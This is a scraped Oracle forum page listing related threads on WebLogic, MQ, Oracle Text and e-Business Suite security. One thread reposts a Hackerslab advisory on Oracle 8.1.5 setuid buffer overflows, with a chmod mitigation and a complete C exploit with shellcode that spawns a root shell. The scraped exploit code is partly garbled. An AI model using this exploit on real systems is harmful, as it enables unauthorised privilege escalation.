JAX-RS security: exiting/applicable Oracle docs?

Similar Messages

• JAX WS SECURITY

  Hi,
  i have been trying to setup security, ws addressing for a jax ws service. I am not able to find a suitable example or documentation. Any pointers? The weblogic documentation are mostly for jax rpc.
  Thanks in advance,
  -S

  An example can be found here: http://docs.oracle.com/cd/E21764_01/web.1111/e13713/message.htm#CDEBIJEJ
  which is part of the document securing web services (http://docs.oracle.com/cd/E21764_01/web.1111/e13713/toc.htm)

• Security when using oracle text

  Hello,
  We would like to use Oracle text functionality on Oracle 10 but the System Admin told us that Oracle is accessing the filesystem with the user account who launched the oracle instance.
  He told us that this is a security problem : giving oracle password gives access to the file system.
  Is that true and is there a solution to make oracle connect to the filesystem with another linux user account ?
  Thanks a lot !

  raford wrote:
  This only applies when you use the FILE_DATASTORE to index documents on disk, rather than in the file system.
  You can restrict access to this feature by only allowing users having a specific role to use it - see
  http://download.oracle.com/docs/cd/B28359_01/text.111/b28304/cdatadic.htm#BHCBIFEA
  (NB. this is in the 11g documentation - I can't find it in the 10g manual but the functionality is the same).
  It's the database process itself which accesses the files, so it will always access them as the owner of the database process, there's no way to change that.What do you mean when you said " FILE_DATASTORE to index documents on disk, rather than in the file system" ?

• Security Evaluation of Oracle Application Server

  Are there any published documents on security evaluation of Oracle Application Server?
  Is it secure as a tool against some attacks, for example, are following vulnerabilities when applicable to the server dealt with or should be handled by application? :
  failure to restrict url access,
  broken authentication and session management
  insecure cryptographic storage,
  injection flaws
  failure to restrict directory browsing
  Are there available document that we can refer to on these issues?
  Regards
  Farbod

  Thank you again.
  Can you advise on this part of my message also?
  "Also I see in oracle recommended architectures that there is a firewall between each http server and application server. Does the built in OHS in OAS provide the firewall? or I need to install another firewall?"
  I am going to explain it but I think it is completely inconsistent with the thread title which I got some of my answers in, so let me start a new thread here:
  Application Server Recommended Deployment Architectures, How to?
  Thanks for your useful inputs.
  Best Regards,
  Farbod

• Security vulnerability in Oracle 8.1.5

  The following email was forwarded to me about possible security vulnerabilities.
  I am looking for verification from both Oracle and the user comunity.
  ================================================================================
  [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
  ================================================================================
  File : Oracle 8.1.5
  SYSTEM : LINUX
  Tested by RedHat Linux 6.2
  INFO :
  There are two security vulnerability in Oracle.
  1. buffer overflow
  It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
  one of the environmental value of Oracle.
  Oracle applications that are vulnerable to buffer overflow are as follow :
  - names
  - namesctl
  - onrsd
  - osslogin
  - tnslsnr
  - tnsping
  - trcasst
  - trcroute
  Thease applications allow an attacker to excute a buffer overflow exploit.
  2. Log-files created
  When a user excutes one of Oracle applications such as names, oracle or tnslsnr,
  following log files are created.
  names
  ======
  -rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
  -rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
  -rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
  oracle
  ======
  -rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
  tnslsnr
  =======
  -rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
  SOLUTION
  Contact your vendor for a patch or close setuid permission.
  # su - oracle
  $ cd /oracle_8.1.5_install_directory/bin
  $ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
  ==-------------------------------------------------------------------------------==
  * ** ** * [email protected] [yong-jun, kim]
  * ** ** * [ [URL=http://www.hackerslab.org]http://www.hackerslab.org ]
  ******** HACKERSLAB (C) since 1999
  ==-------------------------------------------------------------------------------==
  Oracle 8.1.5 exploit
  -by loveyou
  offset value : -500 ~ +500
  #include <stdio.h>
  #include <stdlib.h>
  #define BUFFER 800
  #define NOP 0x90
  #define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
  char shellcode[] =
  /* - K2 - */
  /* main: */
  "\xeb\x1d" /* jmp callz */
  /* start: */
  "\x5e" /* popl %esi */
  "\x29\xc0" /* subl %eax, %eax */
  "\x88\x46\x07" /* movb %al, 0x07(%esi) */
  "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
  "\x89\x76\x08" /* movl %esi, 0x08(%esi) */
  "\xb0\x0b" /* movb $0x0b, %al */
  "\x87\xf3" /* xchgl %esi, %ebx */
  "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
  "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
  "\xcd\x80" /* int $0x80 */
  "\x29\xc0" /* subl %eax, %eax */
  "\x40" /* incl %eax */
  "\xcd\x80" /* int $0x80 */
  /* callz: */
  "\xe8\xde\xff\xff\xff" /* call start */
  "/bin/sh";
  unsigned long getesp(void)
  __asm__("movl %esp,%eax");
  int main(int argc, char *argv[])
  char buff, ptr,binary[120];
  long *addr_ptr, addr;
  int bsize=BUFFER;
  int i,offset;
  offset = 0 ;
  if ( argc > 1 ) offset = atoi(argv[1]);
  buff = malloc(bsize);
  addr = getesp() - 5933 - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
  *(addr_ptr++) = addr;
  memset(buff,bsize/2,NOP);
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
  *(ptr++) = shellcode;
  buff[bsize - 1] = '\0';
  setenv("ORACLE_HOME",buff,1);
  printf("[ offset:%d buffer=%d ret:0x%x ]\n",
  offset,strlen(buff),addr);
  system(PATH);
  null

  Hi Peter,
  I was told that Oracle8 and Oracle8i Parallel Server on IBM
  RS/6000 AIX comes with its own Lock Manager and this LM does not
  rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
  Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
  (Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
  HACMP but came with a special LM.)
  Cluster-wide Filesystems are not used for OPS on Unix, as far as
  I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
  must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
  Logical Volumes on AIX).
  So I guess it should be possible for Oracle to port OPS to Linux.
  No special Cluster-Services would be needed for OPS on Linux,
  just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
  100BaseT).
  Peter Sechser (guest) wrote:
  : Dave,
  : Parallel Server needs some cluster services in order to
  : communicate between several nodes. So, the operating system has
  : to offer things like inter-node communication services,
  : cluster-wide lock communication services and a clusterwide
  : filesystem. I'm not quite sure, to what degree Linux
  offers/will
  : offer these services.
  : Peter
  null

• WLS 8.1 MDBs, Websphere MQ QMs and Security Exits....

            Hi:
            I am testing an MDB that is listening on a Websphere MQ 5.3 Queue. For security,
            I have secured the Server Connection Channel of the Queue Manager (to which the
            Queue belongs to) with a Security Exit.
            Using the Foreign JMS Servers section in the Admin console, I defined a 'Foreign
            JMS Connection Factory' that has the userid & password that is supposed to be
            passed to Websphere MQ.
            When the MDB comes up, it throws a SecurityException. In the background, the Security
            Exit log indicates that the MDB tried to make multiple connections to the Server
            Channel. The Deployment descriptor has the 'MAX BEANS IN FREE POOL' set to 1.
            My issues are:
            1. When the MDB comes up the Server Connection Channel shows multiple connections.
            I know there is only one MDB, so I am curious why there would be multiple connections
            to the same Channel.
            2. The Security Exit log shows that the userid and passord was passed on to MQ
            certain times and other times it was not. The net result is the Security Exit
            rejected the MDB Connections (when the userid and pwd was blanks) and the Bean
            did not come up properly.
            I am concerned with Issue 2. Because, all I am able to control is giving the userid
            and pwd in the Foreign JMS Server section. WLS 8.1 is supposed to pass on the
            credentials properly to MQ when needed. Is WLS 8.1 NOT doing what is expected
            or am I missing something?
            What is the procedure to deploy a WLS 81 MDB that is listening on a queue whose
            QM is secured by an MQ Security Exit.
            Please help!
            

  When you deploy any EJB or servlet that uses the "resource-reference", the
            container (after a short delay) tries to make a connection to get the
            XAResource for that JMS provider. It then registers that with JTA. That way,
            JTA can perform transaction recovery on the JMS provider sooner rather than
            later. (If we waited to register the MQSeries resource with JTA until you
            used it, then if MQ had prepared transactions, they wouldn't be resolved
            until you actually tried to send a message.)
            As for the "multiple connections", I believe that the MQSeries JMS library
            uses a single MQ "connection handle" for every JMS session. (That's because
            MQ connection handles aren't thread-safe.) In our pool of the JMS Session
            objects, we open more than one session initially, so that might be why
            you're seeing multiple connections.
            You can monitor the pooling of the JMS sessions using the console. Click on
            your server in the "servers" tab in the left-hand tree view, then on
            "Monitoring", then on "JMS", and then on "Monitor Pooled JMS Connections".
            greg
            "Sridhar Krishnaswamy" <[email protected]> wrote in message
            news:[email protected]...
            >
            > I tried the steps you have mentioned. But the userid still does not come
            across
            > to MQSeries. So, I will follow up with Support. The MDB is passing on the
            credentials
            > fine when using the same QCF to put the messages to.
            >
            > On the issue of multiple connections, you are right. The connections are
            because
            > of the resource-ref entries. Though I am not sure why the MDB is actually
            trying
            > to establish multiple connections for every resource-ref entry (because
            the pooling
            > mechanism kicks in?). Also, in my design, some of the resource-ref are
            actually
            > 'stand-bys' to be used only if the MDB fails to put the message using the
            primary
            > resource-ref entry. I would have thought that the physical connections
            will actually
            > be made when the call for looking up the QCF is made by the bean or
            createQueueConnection
            > called. Just for my knowledge, I would like to know why the Container is
            establishing
            > the connections upfront.
            >
            > As always, I really appreciate your help, Greg.
            >
            > Thanks,
            > Sridhar
            >
            > "Greg Brail" <[email protected]> wrote:
            > >At the moment, the username and password used to receive messages come
            > >from
            > >a differenct place, and not from the "Foreign JMS Connection Factory"
            > >screen. (Yes, I realize that this is confusing.) To do what you want,
            > >you
            > >need to define a "credential mapping":
            > >
            > >-- Create a WebLogic Server user using the "security" section of the
            > >console, and assign the password that you will need to connect to MQ.
            > >
            > >-- Right-click on your MDB in the left-hand tree view, and select "Define
            > >Roles and Policies for Individual Beans"
            > >
            > >-- You should see a list of MDBs on the screen. Click on "define
            credential
            > >mapping". (I forget the exact wording, but it's something like that.)
            > >
            > >-- On this screen, you enter the MQSeries username that you'll need to
            > >set,
            > >and the WebLogic user that you created in the first step. It then uses
            > >the
            > >password from this WebLogic username.
            > >
            > >If you have trouble with this, please call support. I know that some
            > >people
            > >have had trouble with this particular feature.
            > >
            > >I'm not sure about the multiple connections. Is it possible that you
            > >have a
            > >"resource-reference" declared for MQ somewhere?
            > >
            > > greg
            > >
            > >"Sridhar Krishnaswamy" <[email protected]> wrote in message
            > >news:[email protected]...
            > >>
            > >> Hi:
            > >> I am testing an MDB that is listening on a Websphere MQ 5.3 Queue.
            > >For
            > >security,
            > >> I have secured the Server Connection Channel of the Queue Manager (to
            > >which the
            > >> Queue belongs to) with a Security Exit.
            > >>
            > >> Using the Foreign JMS Servers section in the Admin console, I defined
            > >a
            > >'Foreign
            > >> JMS Connection Factory' that has the userid & password that is supposed
            > >to
            > >be
            > >> passed to Websphere MQ.
            > >>
            > >> When the MDB comes up, it throws a SecurityException. In the
            background,
            > >the Security
            > >> Exit log indicates that the MDB tried to make multiple connections
            > >to the
            > >Server
            > >> Channel. The Deployment descriptor has the 'MAX BEANS IN FREE POOL'
            > >set to
            > >1.
            > >> My issues are:
            > >>
            > >> 1. When the MDB comes up the Server Connection Channel shows multiple
            > >connections.
            > >> I know there is only one MDB, so I am curious why there would be
            multiple
            > >connections
            > >> to the same Channel.
            > >> 2. The Security Exit log shows that the userid and passord was passed
            > >on
            > >to MQ
            > >> certain times and other times it was not. The net result is the
            Security
            > >Exit
            > >> rejected the MDB Connections (when the userid and pwd was blanks) and
            > >the
            > >Bean
            > >> did not come up properly.
            > >>
            > >> I am concerned with Issue 2. Because, all I am able to control is
            giving
            > >the userid
            > >> and pwd in the Foreign JMS Server section. WLS 8.1 is supposed to pass
            > >on
            > >the
            > >> credentials properly to MQ when needed. Is WLS 8.1 NOT doing what is
            > >expected
            > >> or am I missing something?
            > >>
            > >> What is the procedure to deploy a WLS 81 MDB that is listening on a
            > >queue
            > >whose
            > >> QM is secured by an MQ Security Exit.
            > >>
            > >> Please help!
            > >
            > >
            >
            

• Small office (5 users) - Accounting - wanting to secure ingress/egress of docs..

  Small office (5 users) - Accounting - wanting to secure ingress/egress of docs..I haven't seen this answered for an office of this size.I have the need for a relatively cheap software package or guidelines (I'll still keep the search active) for how to block, or at least alert, of sensitive data from leaving the company.I know that I'll have challenges on:1. Blocking certain attachment types from being sent, via webmail, web site attach, email. I am sure someone's written a how-to but I'm darned if I can find it. Suggestions?
  2. Blocking certain programs from running (whitelist/blacklist) - not really wanting to be deep in their pockets every time the application is updated, so not sure if a hash list would be a good idea based on a GPO security policy, or if black/white lists are best?3. Web blocking - I'm thinking I am wanting to...
  This topic first appeared in the Spiceworks Community

  Hi guys,First, I've done a lot of searching on the weband read a few different threads on Spiceworks regarding HIPPA compliance and encrypting hard drives.Specifically these two threads:http://community.spiceworks.com/topic/596465-encryption-for-hipaa-compliancehttp://community.spiceworks.com/topic/320759-how-are-you-handling-hipaa-s-latest-data-at-rest-rulesSo I have a new client that's in the medical field. He has a server that's about two-three years old that looks as ifit was built with budget at the forefront. It's a whitebox with an Asus P8H77-v motherboard, 16 GB of ram, an i3 processor& two 1 TBSATA drives using raid 1 right off the motherboard. The roles it has: DNS/DHCP/File server/AD. Side note - eventhough it's been setup for AD none of the computers are on the domain.Their EMR software is Tracknet & the datais being stored...

• Multi security groups in Oracle apps hrms

  Hi All,
  Could you please let us know how to enable or disable multi security groups in Oracle Apps hrms?
  Thnaks,
  Anil

  If you have access to Oracle Help-on-line check it there
  <BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Originally posted by Amit Das ([email protected]):
  Can you please tell me of any document/book etc which describes the security features in Oracle Apps specially on Oracle financials. <HR></BLOCKQUOTE>
  null

• Security features in Oracle Apps (Oracle Financuals)

  Can you please tell me of any document/book etc which describes the security features in Oracle Apps specially on Oracle financials.

  If you have access to Oracle Help-on-line check it there
  <BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Originally posted by Amit Das ([email protected]):
  Can you please tell me of any document/book etc which describes the security features in Oracle Apps specially on Oracle financials. <HR></BLOCKQUOTE>
  null

• Looking for Oracle Doc on RAC...

  Hi,
  I am looking for an Oracle doc (Metalink or whatever), that will give me Oracle's recommendations on how to best configure a 4 Node RAC Env on RHLE4. We are running mainly a data warehouse shop here and we are trying to best configure our Network for this...things like NIC cards (1 gb 2, 2gb, etc, etc), InterConnect, etc, etc...anything would help us.
  Is there such a doc out there?

  http://www.grumpy-dba.com
  http://blogs.oracle.com/AlejandroVargas/gems/RACDetailDesignandBestPracti.pdf
  Good and useful stuff in the blog.
  Ravi

• Security Measures of Oracle e-business Suite

  Hi ,
  Can anyone please provide any link/material on Security Measures of Oracle e-business Suite.
  I need this stuff pretty urgently.
  Thanks in advance,
  Sandy...

  Best Practices for Securing Oracle E-Business Suite (Metalink Note 189367.1)

• Security issues on Oracle Database (10g)

  Hello,
  I need to make a security manual for Oracle (10g) databases. This has to be some sort of checklist to assure a database is secure. I am thinking of encryption, least privilege, limit access, etc etc. I am sure this has been done before. Please help me with links to documents about this.
  Kind regards,
  Rob Schenk

  (Funny thing - Oracle has hired people to write documentation and has placed it online for anyone to read.)
  You just might find what you need in the "Security Guide" at http://www.oracle.com/pls/db102/portal.portal_db?selected=1
  If documentation is not sufficient, I recommend http://www.amazon.com/gp/product/0974372749/

• Security Rules in Oracle Financials GL

  I have defined security rules in Oracle Financials GL version 11.0.3. The security rules can be applied in form level.
  e.g For account inquiry, only limited accounts can be viewed.
  But for all reports in Oracle Financials, it's not restricted by the rules. How can I applied those rules in reports as well?

  Unfortunately data in standard and bespoke oracle reports is not restricted by security rules by default.
  Security can be enabled for FSG reports.
  If you need security rules to be applied to standard reports, I am afraid, you need customization.

• Viewing Oracle docs on a Kindle?

  I'm thinking of buying a Kindle, solely to view technical PDFs.
  Has anyone viewed the Oracle doc PDFs (e.g., from tahiti.oracle.com) on a Kindle? I understrand PDF viewability is kind of hit-or-miss.

  I owned a kindle and read Oracle documents on mine before I sold it and yes the readiblity was great. My only problem was when reading text books. I realized that reading text books the old way was better for me than on an e-reader. So I sold mine. It was not because of look and feel of the document, but I could not just nevigate faster making references, checking souces back and forward.
  Edited by: Albert Zaza on Nov 29, 2010 12:02 PM

• Applying security patch to Oracle 10G on Linux

  Hello,
  I'm new to Oracle DBA world, need to apply security patch to Oracle 10G on Linux server, any tips and notes would be appreciated.
  thanks
  Sam

  Manish,
  1. I have to upgrade the database version from 10.2.0.2 to 10.2.0.4 on Linux, Is there any proper documentation which will help me out?Please refer to the following document.
  Note: 454750.1 - Oracle Apps Release 12 with Oracle Database 10.2.0 interoperability notes
  https://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=454750.1
  2. What are the types of oracle database patches? what is the proper procedure to apply those kind of patches to Oracle 10g on Linux?
  Most of the patches in this upgrade are database patches (which should be applied using opatch). The main upgrade patch (Patch 6810189 - 10.2.0.4 patch set) should be applied using Oracle Universal Installer (runInstaller).
  Always follow the steps in the patch README file before applying any patch.
  Regards,
  Hussein